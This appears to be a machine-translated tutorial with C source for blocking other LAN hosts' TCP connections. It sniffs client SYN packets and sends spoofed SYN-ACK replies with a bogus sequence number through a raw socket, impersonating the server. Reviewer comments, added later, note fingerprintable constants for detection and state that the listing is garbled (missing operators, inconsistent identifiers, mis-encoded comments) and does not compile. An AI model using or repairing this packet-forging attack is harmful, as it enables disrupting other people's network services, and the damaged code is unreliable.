Forging IP packets to block TCP connections
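Have you ever wondered how to stop other hosts on a LAN from reaching a web server, POP3, FTP and so on? How can that be done? As everyone knows, a TCP connection is established with a three-way handshake, and only after it completes is the connection confirmed. So after the first handshake packet (the client's SYN) we should be able to forge the server's handshake reply, so that the TCP connection fails and the service cannot be reached. The forged reply carries a sequence number the real server never chose, so the client's acknowledgement does not match the server's state and the handshake does not complete. The program is as follows: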
/*
 * Decodeip: examines one captured IP packet and, when it passes the
 * "first handshake packet" test below, calls Sendtcp_synack with the
 * packet's destination as the new source and the packet's source as the
 * new destination, i.e. it answers the SYN on behalf of the host the
 * SYN was addressed to.
 *
 * Parameters (as far as the listing shows):
 *   BUF      - start of the captured packet, read as an IP header.
 *   IBUFSIZE - size of the captured packet in bytes.
 *
 * NOTE(review): the listing was damaged by extraction. Identifier case
 * is inconsistent (buf/BUF, piphdr/Piphdr), at least one `+` was lost
 * (`BUF iiphlen`), `/ /` stands where `//` was meant, and the `IF` line
 * has unbalanced parentheses. It does not compile as shown.
 * NOTE(review): szdestip and szsourceip are not declared or filled in
 * anywhere in the visible listing; presumably they are derived from the
 * IP header's address fields in code not shown here. Confirm.
 */
Void Decodeip (BUF, IBUFSIZE) / / Analyzes the IP Packets IP
{
Ipheader * piphdr;
TCPHEADER * PTCPHDR;
Piphdr = (ipheader *) buf;
// Locate the TCP header, which starts directly after the IP header.
// NOTE(review): the expression below is garbled. The low nibble of
// h_lenver is the IP header length in 32-bit words, so the intended
// value is presumably that nibble multiplied by the word size. Confirm.
INT iiphlen = SizeOf (piphdr-> h_lenver & 0xf);
PTCPHDR = (TCPHEADER *) (BUF iiphlen);
// The test below accepts a packet only if its size is exactly 48 bytes,
// its protocol is TCP and its flag byte equals 2 (SYN set, nothing else).
// NOTE(review): th_flag is a TCP header field but is read through the
// IP header pointer here; presumably ptcphdr was meant. Confirm.
/ / Judgment is the first handshake IP packet, piphdr-> th_flag = 2 ("-s ----")
IF (ibufsize == 48) && (piphdr-> iprotocol == ipproto_tcp) && (piphdr-> th_flag == 2)
Sendtcp_synack (szdestip, szsourceip, ptcphdr-> destport, ptcphdr-> Srcport, PTCPHDR-> SEQ);
}
/*
 * sendTCP_SYNACK: builds one IPv4 packet carrying a TCP segment with the
 * SYN and ACK flags set (flag byte 0x12) plus a 4-byte option, and sends
 * it through a raw socket on which IP_HDRINCL is enabled, so the IP
 * header, including the source address, is the one written here.
 *
 * Parameters:
 *   szSrcIP  - dotted-quad string placed in the IP source field via inet_addr.
 *   szDestIP - dotted-quad string used for the IP destination field and for
 *              the sendto() address.
 *   srcPort  - TCP source port; htons() is applied here.
 *   destPort - TCP destination port; htons() is applied here.
 *   iAck     - sequence number taken from the observed SYN. The listing
 *              shows `htonl (iAck 1)`; presumably `iAck + 1` with the
 *              operator lost in extraction. Confirm.
 *
 * Return: the function is declared void but its statements return
 * FALSE / true. NOTE(review): the declaration and the returns disagree.
 *
 * Detection notes: every header value other than addresses, ports and the
 * acknowledgement number is a constant in this listing: IP identification
 * 17393, TCP sequence number 0x581A784D, window 65535, a TTL of 57 (read
 * from the garbled part of the IP header line) and a single option
 * 02 04 05 B4 (kind 2, length 4, value 0x05B4 = 1460). A SYN-ACK whose
 * initial sequence number and IP identification repeat across unrelated
 * connections can be matched on those values by a network sensor.
 *
 * NOTE(review): the listing was damaged by extraction. Several statements
 * share one line behind a `//` comment, `+` operators are missing
 * (`sendBuf sizeof (psd_header)`, `PTR 1`), identifier case varies
 * (sendBuf / Sendbuf / sendbuf, itdalsize / itotalsize / ipotalsize) and
 * some comments are mis-encoded. It does not compile as shown.
 */
void sendTCP_SYNACK (char * szSrcIP, char * szDestIP, unsigned short srcPort, unsigned short destPort, unsigned int iAck) {int iErrorCode; SOCKET s; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header; struct sockaddr_in remote; char * ptr = NULL; / / Create Sockets = Socket (AF_INET, SOCK_RAW, IPPROTO_IP); if (Checksockerror (S, "Socket-TCP") RETURN FALSE
// IP_HDRINCL tells the stack that the caller supplies the complete IP header.
// The socket is closed again if the option cannot be set.
BOOL bOpt = TRUE; iErrorCode = setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) & bOpt, sizeof (bOpt)); if (CheckSockError (iErrorCode, "setsockopt-TCP")) {closesocket (s); return FALSE;}
/ / --- end - // camouflage connection
// Sizes: 44 bytes in total, 24 of them TCP, which leaves 20 for the IP
// header and matches the literal 20 passed to Checksum for the IP header.
Unsigned short itdalsize = 44; unsigned short itcpsize = 24; char * sendbuf = new char [itotalsize];
// IP header: version 4 in the high nibble, header length in 32-bit words in
// the low nibble. The checksum field is zeroed before the checksum is
// computed over the header.
IP_HEADER.H_LENVER = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); // High four-digit version number, low four first length ip_header.total_len = htons (ipotalsize); // 16-bit total length IP_HEADER.TOS = 0; ip_header.ident = htons (17393); //16?? ±êê??p_header.frag_and_flags=0; //3?? ± ????????offsetip_header.ttl=57; //8?? é'' ?ê ± ?ttlip_header.proto=ipproto_tcp; //8???d-òé (Tcp ,udp?-)ip_header.checksum=0; // 16-bit check and ip_header.sourceip = INET_ADDR (SZSRCIP); // 32 Yuanyuan Address · IP_Header.Destip = INET_ADDR (SZDestip); // 32-bit destination address • IP_HEADER.CHECKSUM = Checksum ((Ushort *) & ip_header, 20);
// TCP header: flag byte 0x12 is SYN|ACK although the original trailing
// comment says only "syn flag". The sequence number is a fixed constant.
// fill TCP header tcp_header.th_sport = htons (srcPort); // source port tcp_header.th_dport = htons (destPort); // destination port tcp_header.th_seq = htonl (0x581A784D); // SYN SEQ ID tcp_header.th_ack = htonl (iAck 1); // Answer number TCP_HEADER.TH_LENRES = (Itcpsize / sizeof (unsigned long) << 4 | 0); // TCP length and reserved bit TCP_HEADER.TH_FLAG = 0x12; // syn flag
TCP_HEADER.TH_WIN = HTONS (65535); // Window size TCP_HEADER.TH_URP = 0; // Emergency pointer TCP_HEADER.TH_SUM = 0; // Check and
// Fill the TCP pseudo header (used only to compute the TCP checksum)
PSD_Header.saddr = IP_HEADER.SOURCEIP; PSD_Header.daddr = IP_HEADER.DESTIP; PSD_HEADER.MBZ = 0; psd_header.ptcl = ipproto_tcp; psd_header.tcpl = htons (itcpsize);
// First pass over the buffer: pseudo header, TCP header and the 4 option
// bytes are laid out only so the TCP checksum can be computed over them.
ZeroMemory (sendBuf, iTotalSize); // calculate tcp checksum, comprising a pseudo TCP headermemcpy (sendBuf, & psd_header, sizeof (psd_header)); ptr = sendBuf sizeof (psd_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)) PTR = sendbuf sizeof (PSD_HEADER) SIZEOF (TCP_HEADER); * PTR = (char) 0x02; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; TCP_HEADER.TH_SUM = Checksum ((USHORT *) Sendbuf, sizeof (psd_header) 24);
// The buffer is cleared and reused for the packet that is actually sent.
ZeromeMory (Sendbuf, ITOTALSIZE);
// Fill the send buffer: IP header, TCP header, then the same 4 option bytes.
// NOTE(review): the result of CheckSockError after sendto is not acted on,
// so a failed send still reaches the final `return true`.
memcpy (sendBuf, & ip_header, sizeof (ip_header)); ptr = sendBuf sizeof (ip_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)); ptr = sendBuf sizeof (ip_header) sizeof (tcp_header); * ptr = (char) 0x02; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; remote.sin_family = AF_INET; Remote.sin_Port = htons (destPort); remote.sin_addr.s_addr = inet_addr (szDestIP); iErrorCode = sendto (s, sendBuf, iTotalSize, 0, (SOCKADDR *) & remote, sizeof (remote)); CheckSockError (iErrorCode, "SYNACK sendto") ; // disguise closing connection hoodsize = 40; itcpsize = 20; // end -------- CloseSocket (s); delete [] sendbuf; return true;}